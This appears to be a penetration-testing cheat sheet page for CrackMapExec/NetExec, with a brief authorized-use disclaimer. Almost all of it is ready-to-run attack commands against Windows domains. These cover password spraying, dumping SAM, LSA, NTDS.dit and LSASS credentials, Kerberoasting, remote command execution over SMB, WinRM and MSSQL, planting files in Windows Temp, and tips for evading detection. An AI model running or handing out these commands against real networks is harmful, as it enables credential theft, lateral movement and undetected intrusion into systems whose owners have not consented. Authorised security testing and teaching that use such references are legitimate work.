← All cheat sheets

CRACKMAPEXEC

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

CrackMapExec (now NetExec) is a Swiss army knife for pentesting networks.
Supports SMB, LDAP, WinRM, MSSQL, SSH, RDP, WMI protocols.

INSTALLATION#

# NetExec (successor to CME)
pip install netexec
nxc --help

# CrackMapExec (legacy)
pip install crackmapexec
cme --help

BASIC SYNTAX#

nxc <protocol> <target> [options]
cme <protocol> <target> [options]

# Protocols: smb, ldap, winrm, mssql, ssh, rdp, wmi, ftp

TARGET SPECIFICATION#

nxc smb 192.168.1.100              # Single IP
nxc smb 192.168.1.0/24             # CIDR range
nxc smb 192.168.1.1-100            # IP range
nxc smb targets.txt                # File with targets
nxc smb 192.168.1.100,192.168.1.101 # Multiple IPs

AUTHENTICATION#

nxc smb target -u user -p password
nxc smb target -u user -p 'P@ssw0rd!'
nxc smb target -u user -H NTHASH
nxc smb target -u user -H LMHASH:NTHASH
nxc smb target -u user -p password -d domain
nxc smb target -u users.txt -p passwords.txt   # Spray
nxc smb target -u user -p password --local-auth # Local account

# Kerberos
nxc smb target -u user -p password -k
nxc smb target --use-kcache        # Use ccache

SMB OPERATIONS#


    

ENUMERATION#

# Host info
nxc smb target                     # Basic enum
nxc smb target --shares            # List shares
nxc smb target --shares -u user -p pass
nxc smb target --users             # List users
nxc smb target --groups            # List groups
nxc smb target --pass-pol          # Password policy
nxc smb target --rid-brute         # RID cycling
nxc smb target --sessions          # Active sessions
nxc smb target --disks             # List disks
nxc smb target --loggedon-users    # Logged on users
nxc smb target --local-groups      # Local groups
nxc smb target --wmi               # WMI query

# Spider shares
nxc smb target -u user -p pass --spider C$
nxc smb target -u user -p pass --spider C$ --pattern txt,xml,config
nxc smb target -u user -p pass -M spider_plus

PASSWORD SPRAYING#

# Single password against multiple users
nxc smb target -u users.txt -p 'Password123'

# Multiple passwords (careful with lockouts!)
nxc smb target -u users.txt -p passwords.txt
nxc smb target -u users.txt -p passwords.txt --no-bruteforce  # One-to-one

# Continue on success
nxc smb target -u users.txt -p 'Password123' --continue-on-success

CREDENTIAL DUMPING#

# SAM dump
nxc smb target -u admin -p pass --sam

# LSA secrets
nxc smb target -u admin -p pass --lsa

# NTDS.dit (Domain Controller)
nxc smb DC -u admin -p pass --ntds
nxc smb DC -u admin -p pass --ntds vss      # VSS method
nxc smb DC -u admin -p pass --ntds drsuapi  # DRSUAPI method

# LSASS dump
nxc smb target -u admin -p pass -M lsassy
nxc smb target -u admin -p pass -M nanodump
nxc smb target -u admin -p pass -M procdump

COMMAND EXECUTION#

# Execute commands
nxc smb target -u admin -p pass -x "whoami"
nxc smb target -u admin -p pass -x "ipconfig /all"

# PowerShell execution
nxc smb target -u admin -p pass -X "Get-Process"
nxc smb target -u admin -p pass -X "$PSVersionTable"

# Specify execution method
nxc smb target -u admin -p pass -x "whoami" --exec-method smbexec
nxc smb target -u admin -p pass -x "whoami" --exec-method wmiexec
nxc smb target -u admin -p pass -x "whoami" --exec-method atexec
nxc smb target -u admin -p pass -x "whoami" --exec-method mmcexec

FILE OPERATIONS#

# Put file
nxc smb target -u admin -p pass --put-file /local/file.exe C:\\Windows\\Temp\\file.exe

# Get file
nxc smb target -u admin -p pass --get-file C:\\Windows\\win.ini /local/win.ini

MODULES#

# List modules
nxc smb -L
nxc smb -M module_name --options

# Common modules
nxc smb target -u admin -p pass -M lsassy         # Dump LSASS
nxc smb target -u admin -p pass -M mimikatz       # Mimikatz
nxc smb target -u admin -p pass -M gpp_password   # GPP passwords
nxc smb target -u admin -p pass -M gpp_autologin  # GPP autologin
nxc smb target -u admin -p pass -M spider_plus    # Advanced share spider
nxc smb target -u admin -p pass -M webdav         # Check WebDAV
nxc smb target -u admin -p pass -M petitpotam     # PetitPotam
nxc smb target -u admin -p pass -M zerologon     # Zerologon check
nxc smb target -u admin -p pass -M nopac         # NoPAC check

LDAP OPERATIONS#

# Enumerate
nxc ldap DC -u user -p pass
nxc ldap DC -u user -p pass --users
nxc ldap DC -u user -p pass --groups
nxc ldap DC -u user -p pass --computers
nxc ldap DC -u user -p pass --trusted-for-delegation
nxc ldap DC -u user -p pass --admin-count

# Kerberoasting
nxc ldap DC -u user -p pass --kerberoasting

# AS-REP roasting
nxc ldap DC -u user -p pass --asreproast

# Password not required
nxc ldap DC -u user -p pass --password-not-required

# GMSA passwords
nxc ldap DC -u user -p pass --gmsa

# MAQ (Machine Account Quota)
nxc ldap DC -u user -p pass -M maq

# Bloodhound
nxc ldap DC -u user -p pass --bloodhound -c All

WINRM OPERATIONS#

nxc winrm target -u admin -p pass
nxc winrm target -u admin -p pass -x "whoami"
nxc winrm target -u admin -p pass -X "Get-Process"

MSSQL OPERATIONS#

# Connect
nxc mssql target -u sa -p password

# Execute query
nxc mssql target -u sa -p pass -q "SELECT @@version"

# Execute command via xp_cmdshell
nxc mssql target -u sa -p pass -x "whoami"

# Enable xp_cmdshell
nxc mssql target -u sa -p pass --enable-xp-cmdshell

# Get hashes
nxc mssql target -u sa -p pass --get-hash

SSH OPERATIONS#

nxc ssh target -u user -p password
nxc ssh target -u user -p password -x "id"
nxc ssh target -u user --key-file id_rsa

RDP OPERATIONS#

nxc rdp target -u admin -p pass
nxc rdp target -u admin -p pass --screenshot
nxc rdp target -u admin -p pass --nla-screenshot

OUTPUT OPTIONS#

# Save output
nxc smb target -u user -p pass --export results.txt

# JSON output
nxc smb target -u user -p pass --export results.json --json

# Log file
nxc smb target -u user -p pass -o /path/to/log

DATABASE#

# CME stores results in database
# ~/.cme/cme.db (CME)
# ~/.nxc/nxc.db (NetExec)

# Query database
cmedb
nxcdb

COMMON WORKFLOWS#

# Network sweep
nxc smb 192.168.1.0/24

# Identify DCs
nxc smb 192.168.1.0/24 | grep "domain:"

# Password spray
nxc smb 192.168.1.0/24 -u users.txt -p 'Summer2024!' --continue-on-success

# Check local admin
nxc smb 192.168.1.0/24 -u admin -p pass

# Dump credentials (admin required)
nxc smb target -u admin -p pass --sam --lsa

# BloodHound collection
nxc ldap DC -u user -p pass --bloodhound -c All -ns DC_IP

EVASION TIPS#

# Specify execution method
nxc smb target -u admin -p pass -x "cmd" --exec-method wmiexec

# Use Kerberos
nxc smb target -u user -p pass -k

# Avoid common detections
# - Use --no-bruteforce for spraying
# - Limit concurrency
# - Use Kerberos auth

QUICK REFERENCE#

nxc smb target                     # Host info
nxc smb target --shares            # List shares
nxc smb target -u user -p pass --sam   # Dump SAM
nxc smb target -u user -p pass --ntds  # Dump NTDS
nxc smb target -u user -p pass -x "cmd" # Execute command
nxc smb target -u user -p pass -M lsassy # Dump LSASS
nxc ldap DC -u user -p pass --users    # Enum users
nxc ldap DC -u user -p pass --bloodhound -c All